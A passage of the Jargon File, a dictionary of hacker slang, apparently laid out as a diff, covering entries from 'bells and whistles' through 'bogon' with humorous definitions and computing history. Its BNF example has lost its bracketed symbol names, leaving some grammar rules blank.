{chrome}, which is intended to attract users. "Now that we've + got the basic program working, let's go back and add some bells and + whistles." No one seems to know what distinguishes a bell from a + whistle. + +:bells, whistles, and gongs: n. A standard elaborated form of + {bells and whistles}; typically said with a pronounced and ironic + accent on the `gongs'. + +:benchmark: [techspeak] n. An inaccurate measure of computer + performance. "In the computer industry, there are three kinds of + lies: lies, damn lies, and benchmarks." Well-known ones include + Whetstone, Dhrystone, Rhealstone (see {h}), the Gabriel LISP + benchmarks (see {gabriel}), the SPECmark suite, and LINPACK. See + also {machoflops}, {MIPS}, {smoke and mirrors}. + +:Berkeley Quality Software: adj. (often abbreviated `BQS') Term used + in a pejorative sense to refer to software that was apparently + created by rather spaced-out hackers late at night to solve some + unique problem. It usually has nonexistent, incomplete, or + incorrect documentation, has been tested on at least two examples, + and core dumps when anyone else attempts to use it. This term was + frequently applied to early versions of the `dbx(1)' debugger. + See also {Berzerkeley}. + +:berklix: /berk'liks/ n.,adj. [contraction of `Berkeley UNIX'] See + {BSD}. Not used at Berkeley itself. May be more common among + {suit}s attempting to sound like cognoscenti than among hackers, + who usually just say `BSD'. + +:berserking: vi. A {MUD} term meaning to gain points *only* + by killing other players and mobiles (non-player characters). + Hence, a Berserker-Wizard is a player character that has achieved + enough points to become a wizard, but only by killing other + characters. Berserking is sometimes frowned upon because of its + inherently antisocial nature, but some MUDs have a `berserker + mode' in which a player becomes *permanently* berserk, can + never flee from a fight, cannot use magic, gets no score for + treasure, but does get double kill points. "Berserker + wizards can seriously damage your elf!" + +:Berzerkeley: /b*r-zer'klee/ [from `berserk', via the name of a + now-deceased record label] n. Humorous distortion of `Berkeley' + used esp. to refer to the practices or products of the + {BSD} UNIX hackers. See {software bloat}, {Missed'em-five}, + {Berkeley Quality Software}. + + Mainstream use of this term in reference to the cultural and + political peculiarities of UC Berkeley as a whole has been reported + from as far back as the 1960s. + +:beta: /bay't*/, /be't*/ or (Commonwealth) /bee't*/ n. 1. In + the {Real World}, software often goes through two stages of + testing: Alpha (in-house) and Beta (out-house?). Software is said + to be `in beta'. 2. Anything that is new and experimental is in + beta. "His girlfriend is in beta" means that he is still testing + for compatibility and reserving judgment. 3. Beta software is + notoriously buggy, so `in beta' connotes flakiness. + + Historical note: More formally, to beta-test is to test a + pre-release (potentially unreliable) version of a piece of software + by making it available to selected customers and users. This term + derives from early 1960s terminology for product cycle checkpoints, + first used at IBM but later standard throughout the industry. + `Alpha Test' was the unit, module, or component test phase; `Beta + Test' was initial system test. These themselves came from earlier + A- and B-tests for hardware. The A-test was a feasibility and + manufacturability evaluation done before any commitment to design + and development. The B-test was a demonstration that the + engineering model functioned as specified. The C-test + (corresponding to today's beta) was the B-test performed on early + samples of the production design. + +:BFI: /B-F-I/ n. See {brute force and ignorance}. Also + encountered in the variants `BFMI', `brute force and + *massive* ignorance' and `BFBI' `brute force and bloody + ignorance'. + +:bible: n. 1. One of a small number of fundamental source books + such as {Knuth} and {K&R}. 2. The most detailed and + authoritative reference for a particular language, operating + system, or other complex software system. + +:BiCapitalization: n. The act said to have been performed on + trademarks (such as {PostScript}, NeXT, {NeWS}, VisiCalc, + FrameMaker, TK!solver, EasyWriter) that have been raised above the + ruck of common coinage by nonstandard capitalization. Too many + {marketroid} types think this sort of thing is really cute, even + the 2,317th time they do it. Compare {studlycaps}. + +:BIFF: /bif/ [USENET] n. The most famous {pseudo}, and the + prototypical {newbie}. Articles from BIFF are characterized by + all uppercase letters sprinkled liberally with bangs, typos, + `cute' misspellings (EVRY BUDY LUVS GOOD OLD BIFF CUZ HE"S A + K00L DOOD AN HE RITES REEL AWESUM THINGZ IN CAPITULL LETTRS LIKE + THIS!!!), use (and often misuse) of fragments of {talk mode} + abbreviations, a long {sig block} (sometimes even a {doubled + sig}), and unbounded na"ivet'e. BIFF posts articles using his + elder brother's VIC-20. BIFF's location is a mystery, as his + articles appear to come from a variety of sites. However, + {BITNET} seems to be the most frequent origin. The theory that + BIFF is a denizen of BITNET is supported by BIFF's (unfortunately + invalid) electronic mail address: BIFF@BIT.NET. + +:biff: /bif/ vt. To notify someone of incoming mail. From the + BSD utility `biff(1)', which was in turn named after a + friendly golden Labrador who used to chase frisbees in the halls at + UCB while 4.2BSD was in development (it had a well-known habit of + barking whenever the mailman came). No relation to + {BIFF}. + +:Big Gray Wall: n. What faces a {VMS} user searching for + documentation. A full VMS kit comes on a pallet, the documentation + taking up around 15 feet of shelf space before the addition of + layered products such as compilers, databases, multivendor + networking, and programming tools. Recent (since VMS version 5) + DEC documentation comes with gray binders; under VMS version 4 the + binders were orange (`big orange wall'), and under version 3 they + were blue. See {VMS}. Often contracted to `Gray Wall'. + +:big iron: n. Large, expensive, ultra-fast computers. Used generally + of {number-crunching} supercomputers such as Crays, but can include + more conventional big commercial IBMish mainframes. Term of + approval; compare {heavy metal}, oppose {dinosaur}. + +:Big Red Switch: [IBM] n. The power switch on a computer, esp. the + `Emergency Pull' switch on an IBM {mainframe} or the power switch + on an IBM PC where it really is large and red. "This !@%$% + {bitty box} is hung again; time to hit the Big Red Switch." + Sources at IBM report that, in tune with the company's passion for + {TLA}s, this is often abbreviated as `BRS' (this has also + become established on FidoNet and in the PC {clone} world). It + is alleged that the emergency pull switch on an IBM 360/91 actually + fired a non-conducting bolt into the main power feed; the BRSes on + more recent machines physically drop a block into place so that + they can't be pushed back in. People get fired for pulling them, + especially inappropriately (see also {molly-guard}). Compare + {power cycle}, {three-finger salute}, {120 reset}; see + also {scram switch}. + +:Big Room, the: n. The extremely large room with the blue ceiling + and intensely bright light (during the day) or black ceiling with + lots of tiny night-lights (during the night) found outside all + computer installations. "He can't come to the phone right now, + he's somewhere out in the Big Room." + +:big win: n. Serendipity. "Yes, those two physicists discovered + high-temperature superconductivity in a batch of ceramic that had + been prepared incorrectly according to their experimental schedule. + Small mistake; big win!" See {win big}. + +:big-endian: [From Swift's `Gulliver's Travels' via the famous + paper `On Holy Wars and a Plea for Peace' by Danny Cohen, + USC/ISI IEN 137, dated April 1, 1980] adj. 1. Describes a computer + architecture in which, within a given multi-byte numeric + representation, the most significant byte has the lowest address + (the word is stored `big-end-first'). Most processors, + including the IBM 370 family, the {PDP-10}, the Motorola + microprocessor families, and most of the various RISC designs + current in mid-1991, are big-endian. See {little-endian}, + {middle-endian}, {NUXI problem}. 2. An {{Internet address}} + the wrong way round. Most of the world follows the Internet + standard and writes email addresses starting with the name of the + computer and ending up with the name of the country. In the U.K. + the Joint Networking Team had decided to do it the other way round + before the Internet domain standard was established; e.g., + me@uk.ac.wigan.cs. Most gateway sites have {ad-hockery} in + their mailers to handle this, but can still be confused. In + particular, the address above could be in the U.K. (domain uk) + or Czechoslovakia (domain cs). + +:bignum: /big'nuhm/ [orig. from MIT MacLISP] n. 1. [techspeak] A + multiple-precision computer representation for very large integers. + More generally, any very large number. "Have you ever looked at + the United States Budget? There's bignums for you!" + 2. [Stanford] In backgammon, large numbers on the dice are called + `bignums', especially a roll of double fives or double sixes + (compare {moby}, sense 4). See also {El Camino Bignum}. + + Sense 1 may require some explanation. Most computer languages + provide a kind of data called `integer', but such computer + integers are usually very limited in size; usually they must be + smaller than than 2^(31) (2,147,483,648) or (on a losing + {bitty box}) 2^(15) (32,768). If you want to work with + numbers larger than that, you have to use floating-point numbers, + which are usually accurate to only six or seven decimal places. + Computer languages that provide bignums can perform exact + calculations on very large numbers, such as 1000! (the factorial + of 1000, which is 1000 times 999 times 998 times ... times 2 + times 1). For example, this value for 1000! was computed by the + MacLISP system using bignums: + + 40238726007709377354370243392300398571937486421071 + 46325437999104299385123986290205920442084869694048 + 00479988610197196058631666872994808558901323829669 + 94459099742450408707375991882362772718873251977950 + 59509952761208749754624970436014182780946464962910 + 56393887437886487337119181045825783647849977012476 + 63288983595573543251318532395846307555740911426241 + 74743493475534286465766116677973966688202912073791 + 43853719588249808126867838374559731746136085379534 + 52422158659320192809087829730843139284440328123155 + 86110369768013573042161687476096758713483120254785 + 89320767169132448426236131412508780208000261683151 + 02734182797770478463586817016436502415369139828126 + 48102130927612448963599287051149649754199093422215 + 66832572080821333186116811553615836546984046708975 + 60290095053761647584772842188967964624494516076535 + 34081989013854424879849599533191017233555566021394 + 50399736280750137837615307127761926849034352625200 + 01588853514733161170210396817592151090778801939317 + 81141945452572238655414610628921879602238389714760 + 88506276862967146674697562911234082439208160153780 + 88989396451826324367161676217916890977991190375403 + 12746222899880051954444142820121873617459926429565 + 81746628302955570299024324153181617210465832036786 + 90611726015878352075151628422554026517048330422614 + 39742869330616908979684825901254583271682264580665 + 26769958652682272807075781391858178889652208164348 + 34482599326604336766017699961283186078838615027946 + 59551311565520360939881806121385586003014356945272 + 24206344631797460594682573103790084024432438465657 + 24501440282188525247093519062092902313649327349756 + 55139587205596542287497740114133469627154228458623 + 77387538230483865688976461927383814900140767310446 + 64025989949022222176590433990188601856652648506179 + 97023561938970178600408118897299183110211712298459 + 01641921068884387121855646124960798722908519296819 + 37238864261483965738229112312502418664935314397013 + 74285319266498753372189406942814341185201580141233 + 44828015051399694290153483077644569099073152433278 + 28826986460278986432113908350621709500259738986355 + 42771967428222487575867657523442202075736305694988 + 25087968928162753848863396909959826280956121450994 + 87170124451646126037902930912088908694202851064018 + 21543994571568059418727489980942547421735824010636 + 77404595741785160829230135358081840096996372524230 + 56085590370062427124341690900415369010593398383577 + 79394109700277534720000000000000000000000000000000 + 00000000000000000000000000000000000000000000000000 + 00000000000000000000000000000000000000000000000000 + 00000000000000000000000000000000000000000000000000 + 00000000000000000000000000000000000000000000000000 + 000000000000000000. + +:bigot: n. A person who is religiously attached to a particular + computer, language, operating system, editor, or other tool (see + {religious issues}). Usually found with a specifier; thus, + `cray bigot', `ITS bigot', `APL bigot', `VMS bigot', + `Berkeley bigot'. True bigots can be distinguished from mere + partisans or zealots by the fact that they refuse to learn + alternatives even when the march of time and/or technology is + threatening to obsolete the favored tool. It is said "You can + tell a bigot, but you can't tell him much." Compare + {weenie}. + +:bit: [from the mainstream meaning and `Binary digIT'] n. + 1. [techspeak] The unit of information; the amount of information + obtained by asking a yes-or-no question for which the two outcomes + are equally probable. 2. [techspeak] A computational quantity that + can take on one of two values, such as true and false or 0 and 1. + 3. A mental flag: a reminder that something should be done + eventually. "I have a bit set for you." (I haven't seen you for + a while, and I'm supposed to tell or ask you something.) 4. More + generally, a (possibly incorrect) mental state of belief. "I have + a bit set that says that you were the last guy to hack on EMACS." + (Meaning "I think you were the last guy to hack on EMACS, and what + I am about to say is predicated on this, so please stop me if this + isn't true.") + + "I just need one bit from you" is a polite way of indicating that + you intend only a short interruption for a question that can + presumably be answered yes or no. + + A bit is said to be `set' if its value is true or 1, and + `reset' or `clear' if its value is false or 0. One speaks of + setting and clearing bits. To {toggle} or `invert' a bit is + to change it, either from 0 to 1 or from 1 to 0. See also + {flag}, {trit}, {mode bit}. + + The term `bit' first appeared in print in the computer-science + sense in 1949, and seems to have been coined by early computer + scientist John Tukey. Tukey records that it evolved over a lunch + table as a handier alternative to `bigit' or `binit'. + +:bit bang: n. Transmission of data on a serial line, when + accomplished by rapidly tweaking a single output bit at the + appropriate times. The technique is a simple + loop with eight OUT and SHIFT instruction pairs for each byte. + Input is more interesting. And full duplex (doing input and output + at the same time) is one way to separate the real hackers from the + {wannabee}s. + + Bit bang was used on certain early models of Prime computers, + presumably when UARTs were too expensive, and on archaic Z80 micros + with a Zilog PIO but no SIO. In an interesting instance of the + {cycle of reincarnation}, this technique is now (1991) coming + back into use on some RISC architectures because it consumes such + an infinitesimal part of the processor that it actually makes sense + not to have a UART. + +:bit bashing: n. (alt. `bit diddling' or {bit twiddling}) Term + used to describe any of several kinds of low-level programming + characterized by manipulation of {bit}, {flag}, {nybble}, + and other smaller-than-character-sized pieces of data; these + include low-level device control, encryption algorithms, checksum + and error-correcting codes, hash functions, some flavors of + graphics programming (see {bitblt}), and assembler/compiler code + generation. May connote either tedium or a real technical + challenge (more usually the former). "The command decoding for + the new tape driver looks pretty solid but the bit-bashing for the + control registers still has bugs." See also {bit bang}, + {mode bit}. + +:bit bucket: n. 1. The universal data sink (originally, the + mythical receptacle used to catch bits when they fall off the end + of a register during a shift instruction). Discarded, lost, or + destroyed data is said to have `gone to the bit bucket'. On + {{UNIX}}, often used for {/dev/null}. Sometimes amplified as + `the Great Bit Bucket in the Sky'. 2. The place where all lost + mail and news messages eventually go. The selection is performed + according to {Finagle's Law}; important mail is much more likely + to end up in the bit bucket than junk mail, which has an almost + 100% probability of getting delivered. Routing to the bit bucket + is automatically performed by mail-transfer agents, news systems, + and the lower layers of the network. 3. The ideal location for all + unwanted mail responses: "Flames about this article to the bit + bucket." Such a request is guaranteed to overflow one's mailbox + with flames. 4. Excuse for all mail that has not been sent. "I + mailed you those figures last week; they must have ended in the bit + bucket." Compare {black hole}. + + This term is used purely in jest. It is based on the fanciful + notion that bits are objects that are not destroyed but only + misplaced. This appears to have been a mutation of an earlier term + `bit box', about which the same legend was current; old-time + hackers also report that trainees used to be told that when the CPU + stored bits into memory it was actually pulling them `out of the + bit box'. See also {chad box}. + + Another variant of this legend has it that, as a consequence of the + `parity preservation law', the number of 1 bits that go to the bit + bucket must equal the number of 0 bits. Any imbalance results in + bits filling up the bit bucket. A qualified computer technician + can empty a full bit bucket as part of scheduled maintenance. + +:bit decay: n. See {bit rot}. People with a physics background + tend to prefer this one for the analogy with particle decay. See + also {computron}, {quantum bogodynamics}. + +:bit rot: n. Also {bit decay}. Hypothetical disease the existence + of which has been deduced from the observation that unused programs + or features will often stop working after sufficient time has + passed, even if `nothing has changed'. The theory explains that + bits decay as if they were radioactive. As time passes, the + contents of a file or the code in a program will become + increasingly garbled. + + There actually are physical processes that produce such effects + (alpha particles generated by trace radionuclides in ceramic chip + packages, for example, can change the contents of a computer memory + unpredictably, and various kinds of subtle media failures can + corrupt files in mass storage), but they are quite rare (and + computers are built with error-detecting circuitry to compensate + for them). The notion long favored among hackers that cosmic + rays are among the causes of such events turns out to be a myth; + see the {cosmic rays} entry for details. + + The term {software rot} is almost synonymous. Software rot is + the effect, bit rot the notional cause. + +:bit twiddling: n. 1. (pejorative) An exercise in tuning (see + {tune}) in which incredible amounts of time and effort go to + produce little noticeable improvement, often with the result that + the code has become incomprehensible. 2. Aimless small + modification to a program, esp. for some pointless goal. + 3. Approx. syn. for {bit bashing}; esp. used for the act of + frobbing the device control register of a peripheral in an attempt + to get it back to a known state. + +:bit-paired keyboard: n. obs. (alt. `bit-shift keyboard') A + non-standard keyboard layout that seems to have originated with the + Teletype ASR-33 and remained common for several years on early + computer equipment. The ASR-33 was a mechanical device (see + {EOU}), so the only way to generate the character codes from + keystrokes was by some physical linkage. The design of the ASR-33 + assigned each character key a basic pattern that could be modified + by flipping bits if the SHIFT or the CTRL key was pressed. In + order to avoid making the thing more of a Rube Goldberg kluge than + it already was, the design had to group characters that shared the + same basic bit pattern on one key. + + Looking at the ASCII chart, we find: + + high low bits + bits 0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 + 010 ! " # $ % & ' ( ) + 011 0 1 2 3 4 5 6 7 8 9 + + This is why the characters !"#$%&'() appear where they do on a + Teletype (thankfully, they didn't use shift-0 for space). This was + *not* the weirdest variant of the {QWERTY} layout widely + seen, by the way; that prize should probably go to one of several + (differing) arrangements on IBM's even clunkier 026 and 029 card + punches. + + When electronic terminals became popular, in the early 1970s, there + was no agreement in the industry over how the keyboards should be + laid out. Some vendors opted to emulate the Teletype keyboard, + while others used the flexibility of electronic circuitry to make + their product look like an office typewriter. These alternatives + became known as `bit-paired' and `typewriter-paired' keyboards. To + a hacker, the bit-paired keyboard seemed far more logical --- and + because most hackers in those days had never learned to touch-type, + there was little pressure from the pioneering users to adapt + keyboards to the typewriter standard. + + The doom of the bit-paired keyboard was the large-scale + introduction of the computer terminal into the normal office + environment, where out-and-out technophobes were expected to use + the equipment. The `typewriter-paired' standard became universal, + `bit-paired' hardware was quickly junked or relegated to dusty + corners, and both terms passed into disuse. + +:bitblt: /bit'blit/ n. [from {BLT}, q.v.] 1. Any of a family + of closely related algorithms for moving and copying rectangles of + bits between main and display memory on a bit-mapped device, or + between two areas of either main or display memory (the requirement + to do the {Right Thing} in the case of overlapping source and + destination rectangles is what makes BitBlt tricky). 2. Synonym + for {blit} or {BLT}. Both uses are borderline techspeak. + +:BITNET: /bit'net/ [acronym: Because It's Time NETwork] n. + Everybody's least favorite piece of the network (see {network, + the}). The BITNET hosts are a collection of IBM dinosaurs and + VAXen (the latter with lobotomized comm hardware) that communicate + using 80-character {{EBCDIC}} card images (see {eighty-column + mind}); thus, they tend to mangle the headers and text of + third-party traffic from the rest of the ASCII/RFC-822 world with + annoying regularity. BITNET is also notorious as the apparent home + of {BIFF}. + +:bits: n.pl. 1. Information. Examples: "I need some bits about file + formats." ("I need to know about file formats.") Compare {core + dump}, sense 4. 2. Machine-readable representation of a document, + specifically as contrasted with paper: "I have only a photocopy + of the Jargon File; does anyone know where I can get the bits?". + See {softcopy}, {source of all good bits} See also {bit}. + +:bitty box: /bit'ee boks/ n. 1. A computer sufficiently small, + primitive, or incapable as to cause a hacker acute claustrophobia + at the thought of developing software on or for it. Especially + used of small, obsolescent, single-tasking-only personal machines + such as the Atari 800, Osborne, Sinclair, VIC-20, TRS-80, or + IBM PC. 2. [Pejorative] More generally, the opposite of `real + computer' (see {Get a real computer!}). See also {mess-dos}, + {toaster}, and {toy}. + +:bixie: /bik'see/ n. Variant {emoticon}s used on BIX (the Byte + Information eXchange). The {smiley} bixie is <@_@>, apparently + intending to represent two cartoon eyes and a mouth. A few others + have been reported. + +:black art: n. A collection of arcane, unpublished, and (by + implication) mostly ad-hoc techniques developed for a particular + application or systems area (compare {black magic}). VLSI design + and compiler code optimization were (in their beginnings) + considered classic examples of black art; as theory developed they + became {deep magic}, and once standard textbooks had been written, + became merely {heavy wizardry}. The huge proliferation of formal + and informal channels for spreading around new computer-related + technologies during the last twenty years has made both the term + `black art' and what it describes less common than formerly. See + also {voodoo programming}. + +:black hole: n. When a piece of email or netnews disappears + mysteriously between its origin and destination sites (that is, + without returning a {bounce message}) it is commonly said to have + `fallen into a black hole'. "I think there's a black hole at + foovax!" conveys suspicion that site foovax has been dropping + a lot of stuff on the floor lately (see {drop on the floor}). + The implied metaphor of email as interstellar travel is interesting + in itself. Compare {bit bucket}. + +:black magic: n. A technique that works, though nobody really + understands why. More obscure than {voodoo programming}, which + may be done by cookbook. Compare also {black art}, {deep + magic}, and {magic number} (sense 2). + +:blargh: /blarg/ [MIT] n. The opposite of {ping}, sense 5; an + exclamation indicating that one has absorbed or is emitting a + quantum of unhappiness. Less common than {ping}. + +:blast: 1. vt.,n. Synonym for {BLT}, used esp. for large data + sends over a network or comm line. Opposite of {snarf}. Usage: + uncommon. The variant `blat' has been reported. 2. vt. + [HP/Apollo] Synonymous with {nuke} (sense 3). Sometimes the + message `Unable to kill all processes. Blast them (y/n)?' would + appear in the command window upon logout. + +:blat: n. 1. Syn. {blast}, sense 1. 2. See {thud}. + +:bletch: /blech/ [from Yiddish/German `brechen', to vomit, poss. + via comic-strip exclamation `blech'] interj. Term of disgust. + Often used in "Ugh, bletch". Compare {barf}. + +:bletcherous: /blech'*-r*s/ adj. Disgusting in design or function; + esthetically unappealing. This word is seldom used of people. + "This keyboard is bletcherous!" (Perhaps the keys don't work very + well, or are misplaced.) See {losing}, {cretinous}, + {bagbiter}, {bogus}, and {random}. The term {bletcherous} + applies to the esthetics of the thing so described; similarly for + {cretinous}. By contrast, something that is `losing' or + `bagbiting' may be failing to meet objective criteria. See also + {bogus} and {random}, which have richer and wider shades of + meaning than any of the above. + +:blinkenlights: /blink'*n-li:tz/ n. Front-panel diagnostic lights + on a computer, esp. a {dinosaur}. Derives from the last word + of the famous blackletter-Gothic sign in mangled pseudo-German that + once graced about half the computer rooms in the English-speaking + world. One version ran in its entirety as follows: + + ACHTUNG! ALLES LOOKENSPEEPERS! Das + computermachine ist nicht fuer gefingerpoken und mittengrabben. + Ist easy schnappen der springenwerk, blowenfusen und poppencorken + mit spitzensparken. Ist nicht fuer gewerken bei das dumpkopfen. + Das rubbernecken sichtseeren keepen das cotten-pickenen hans in das + pockets muss; relaxen und watchen das blinkenlichten. + + + This silliness dates back at least as far as 1959 at Stanford + University and had already gone international by the early 1960s, + when it was reported at London University's ATLAS computing site. + There are several variants of it in circulation, some of which + actually do end with the word `blinkenlights'. + + In an amusing example of turnabout-is-fair-play, German hackers + have developed their own versions of the blinkenlights poster in + fractured English, one of which is reproduced here: + + ATTENTION + This room is fullfilled mit special electronische equippment. + Fingergrabbing and pressing the cnoeppkes from the computers is + allowed for die experts only! So all the "lefthanders" stay away + and do not disturben the brainstorming von here working + intelligencies. Otherwise you will be out thrown and kicked + anderswhere! Also: please keep still and only watchen astaunished + the blinkenlights. + + See also {geef}. + +:blit: /blit/ vt. 1. To copy a large array of bits from one part + of a computer's memory to another part, particularly when the + memory is being used to determine what is shown on a display + screen. "The storage allocator picks through the table and copies + the good parts up into high memory, and then blits it all back + down again." See {bitblt}, {BLT}, {dd}, {cat}, + {blast}, {snarf}. More generally, to perform some operation + (such as toggling) on a large array of bits while moving them. + 2. All-capitalized as `BLIT': an early experimental bit-mapped + terminal designed by Rob Pike at Bell Labs, later commercialized as + the AT&T 5620. (The folk etymology from `Bell Labs Intelligent + Terminal' is incorrect.) + +:blitter: /blit'r/ n. A special-purpose chip or hardware system + built to perform {blit} operations, esp. used for fast + implementation of bit-mapped graphics. The Commodore Amiga and a + few other micros have these, but in 1991 the trend is away from + them (however, see {cycle of reincarnation}). Syn. {raster + blaster}. + +:blivet: /bliv'*t/ [allegedly from a World War II military term + meaning "ten pounds of manure in a five-pound bag"] n. 1. An + intractable problem. 2. A crucial piece of hardware that can't be + fixed or replaced if it breaks. 3. A tool that has been hacked + over by so many incompetent programmers that it has become an + unmaintainable tissue of hacks. 4. An out-of-control but + unkillable development effort. 5. An embarrassing bug that pops up + during a customer demo. + + This term has other meanings in other technical cultures; among + experimental physicists and hardware engineers of various kinds it + seems to mean any random object of unknown purpose (similar to + hackish use of {frob}). It has also been used to describe an + amusing trick-the-eye drawing resembling a three-pronged fork that + appears to depict a three-dimensional object until one realizes + that the parts fit together in an impossible way. + +:BLOB: [acronym, Binary Large OBject] n. Used by database people to + refer to any random large block of bits which needs to be stored in + a database, such as a picture or sound file. The essential point + about a BLOB is that it's an object you can't interpret within the + database itself. + +:block: [from process scheduling terminology in OS theory] 1. vi. + To delay or sit idle while waiting for something. "We're blocking + until everyone gets here." Compare {busy-wait}. 2. `block + on' vt. To block, waiting for (something). "Lunch is blocked on + Phil's arrival." + +:block transfer computations: n. From the television series + "Dr. Who", in which it referred to computations so fiendishly + subtle and complex that they could not be performed by machines. + Used to refer to any task that should be expressible as an + algorithm in theory, but isn't. + +:blow an EPROM: /bloh *n ee'prom/ v. (alt. `blast an EPROM', + `burn an EPROM') To program a read-only memory, e.g. for use + with an embedded system. This term arises because the programming + process for the Programmable Read-Only Memories (PROMs) that + preceded present-day Erasable Programmable Read-Only Memories + (EPROMs) involved intentionally blowing tiny electrical fuses on + the chip. Thus, one was said to `blow' (or `blast') a PROM, and + the terminology carried over even though the write process on + EPROMs is nondestructive. + +:blow away: vt. To remove (files and directories) from permanent + storage, generally by accident. "He reformatted the wrong + partition and blew away last night's netnews." Oppose {nuke}. + +:blow out: vi. Of software, to fail spectacularly; almost as + serious as {crash and burn}. See {blow past}, {blow up}, + {die horribly}. + +:blow past: vt. To {blow out} despite a safeguard. "The server blew + past the 5K reserve buffer." + +:blow up: vi. 1. [scientific computation] To become unstable. Suggests + that the computation is diverging so rapidly that it will soon + overflow or at least go {nonlinear}. 2. Syn. {blow out}. + +:BLT: /B-L-T/, /bl*t/ or (rarely) /belt/ n.,vt. Synonym for + {blit}. This is the original form of {blit} and the ancestor + of {bitblt}. It referred to any large bit-field copy or move + operation (one resource-intensive memory-shuffling operation done + on pre-paged versions of ITS, WAITS, and TOPS-10 was sardonically + referred to as `The Big BLT'). The jargon usage has outlasted the + {PDP-10} BLock Transfer instruction from which {BLT} derives; + nowadays, the assembler mnemonic {BLT} almost always means + `Branch if Less Than zero'. + +:Blue Book: n. 1. Informal name for one of the three standard + references on the page-layout and graphics-control language + {PostScript} (`PostScript Language Tutorial and Cookbook', + Adobe Systems, Addison-Wesley 1985, QA76.73.P67P68, ISBN + 0-201-10179-3); the other two official guides are known as the + {Green Book}, the {Red Book}, and the {White Book} (sense + 2). 2. Informal name for one of the three standard references on + Smalltalk: `Smalltalk-80: The Language and its + Implementation', David Robson, Addison-Wesley 1983, QA76.8.S635G64, + ISBN 0-201-11371-63 (this is also associated with green and red + books). 3. Any of the 1988 standards issued by the CCITT's + ninth plenary assembly. Until now, they have changed color each + review cycle (1984 was {Red Book}, 1992 would be {Green + Book}); however, it is rumored that this convention is going to be + dropped before 1992. These include, among other things, the + X.400 email spec and the Group 1 through 4 fax standards. See also + {{book titles}}. + +:Blue Glue: [IBM] n. IBM's SNA (Systems Network Architecture), an + incredibly {losing} and {bletcherous} communications protocol + widely favored at commercial shops that don't know any better. The + official IBM definition is "that which binds blue boxes + together." See {fear and loathing}. It may not be irrelevant + that {Blue Glue} is the trade name of a 3M product that is + commonly used to hold down the carpet squares to the removable + panel floors common in {dinosaur pen}s. A correspondent at + U. Minn. reports that the CS department there has about 80 bottles + of the stuff hanging about, so they often refer to any messy work + to be done as `using the blue glue'. + +:blue goo: n. Term for `police' {nanobot}s intended to prevent + {gray goo}, denature hazardous waste, destroy pollution, put + ozone back into the stratosphere, prevent halitosis, and promote + truth, justice, and the American way, etc. See + {{nanotechnology}}. + +:blue wire: [IBM] n. Patch wires added to circuit boards at the factory to + correct design or fabrication problems. This may be necessary if + there hasn't been time to design and qualify another board version. + Compare {purple wire}, {red wire}, {yellow wire}. + +:blurgle: /bler'gl/ [Great Britain] n. Spoken {metasyntactic + variable}, to indicate some text which is obvious from context, or + which is already known. If several words are to be replaced, + blurgle may well be doubled or trebled. "To look for something in + several files use `grep string blurgle blurgle'." In each case, + "blurgle blurgle" would be understood to be replaced by the file + you wished to search. Compare {mumble}, sense 6. + +:BNF: /B-N-F/ n. 1. [techspeak] Acronym for `Backus-Naur Form', a + metasyntactic notation used to specify the syntax of programming + languages, command sets, and the like. Widely used for language + descriptions but seldom documented anywhere, so that it must + usually be learned by osmosis from other hackers. Consider this + BNF for a U.S. postal address: + + ::= + + ::= | "." + + ::= [] + | + + ::= [] + + ::= "," + + This translates into English as: "A postal-address consists of a + name-part, followed by a street-address part, followed by a + zip-code part. A personal-part consists of either a first name or + an initial followed by a dot. A name-part consists of either: a + personal-part followed by a last name followed by an optional + `jr-part' (Jr., Sr., or dynastic number) and end-of-line, or a + personal part followed by a name part (this rule illustrates the + use of recursion in BNFs, covering the case of people who use + multiple first and middle names and/or initials). A street address + consists of an optional apartment specifier, followed by a street + number, followed by a street name. A zip-part consists of a + town-name, followed by a comma, followed by a state code, followed + by a ZIP-code followed by an end-of-line." Note that many things + (such as the format of a personal-part, apartment specifier, or + ZIP-code) are left unspecified. These are presumed to be obvious + from context or detailed somewhere nearby. See also {parse}. + 2. The term is also used loosely for any number of variants and + extensions, possibly containing some or all of the {regexp} + wildcards such as `*' or `+'. In fact the example above + isn't the pure form invented for the Algol-60 report; it uses + `[]', which was introduced a few years later in IBM's PL/I + definition but is now universally recognized. 3. In + {{science-fiction fandom}}, BNF means `Big-Name Fan' + (someone famous or notorious). Years ago a fan started handing out + black-on-green BNF buttons at SF conventions; this confused the + hacker contingent terribly. + +:boa: [IBM] n. Any one of the fat cables that lurk under the floor + in a {dinosaur pen}. Possibly so called because they display a + ferocious life of their own when you try to lay them straight and + flat after they have been coiled for some time. It is rumored + within IBM that channel cables for the 370 are limited to 200 feet + because beyond that length the boas get dangerous --- and it is + worth noting that one of the major cable makers uses the trademark + `Anaconda'. + +:board: n. 1. In-context synonym for {bboard}; sometimes used + even for USENET newsgroups. 2. An electronic circuit board + (compare {card}). + +:boat anchor: n. 1. Like {doorstop} but more severe; implies that + the offending hardware is irreversibly dead or useless. "That was + a working motherboard once. One lightning strike later, instant + boat anchor!" 2. A person who just takes up space. + +:BOF: /B-O-F/ or /bof/ n. Abbreviation for the phrase "Birds + Of a Feather" (flocking together), an informal discussion group + and/or bull session scheduled on a conference program. It is not + clear where or when this term originated, but it is now associated + with the USENIX conferences for UNIX techies and was already + established there by 1984. It was used earlier than that at DECUS + conferences, and is reported to have been common at SHARE meetings + as far back as the early 1960s. + +:bogo-sort: /boh`goh-sort'/ n. (var. `stupid-sort') The + archetypical perversely awful algorithm (as opposed to {bubble + sort}, which is merely the generic *bad* algorithm). + Bogo-sort is equivalent to repeatedly throwing a deck of cards in + the air, picking them up at random, and then testing whether they + are in order. It serves as a sort of canonical example of + awfulness. Looking at a program and seeing a dumb algorithm, one + might say "Oh, I see, this program uses bogo-sort." Compare + {bogus}, {brute force}. + +:bogometer: /boh-gom'-*t-er/ n. See {bogosity}. Compare the + `wankometer' described in the {wank} entry; see also + {bogus}. + +:bogon: /boh'gon/ [by analogy with proton/electron/neutron, but + doubtless reinforced after 1980 by the similarity to Douglas + Adams's `Vogons'; see the Bibliography in {appendix C}] n. + 1. The elementary particle of bogosity (see {quantum + bogodynamics}). For instance, "the Ethernet is emitting bogons + again" means that it is broken or acting in an erratic or bogus + fashion. 2. A query packet sent from a TCP/IP domain resolver to a + root server, having the reply bit set instead of the query bit. + 3. Any bogus or incorrectly formed packet sent on a network. 4. By + synecdoche, used to refer to any bogus thing, as in "I'd like to + go to lunch with you but I've got to go to the weekly staff + bogon". 5. A person who is bogus or who says bogus things. This + was historically the original usage, but has been overtaken by its + derivative senses 1--4. See also {bogosity}, 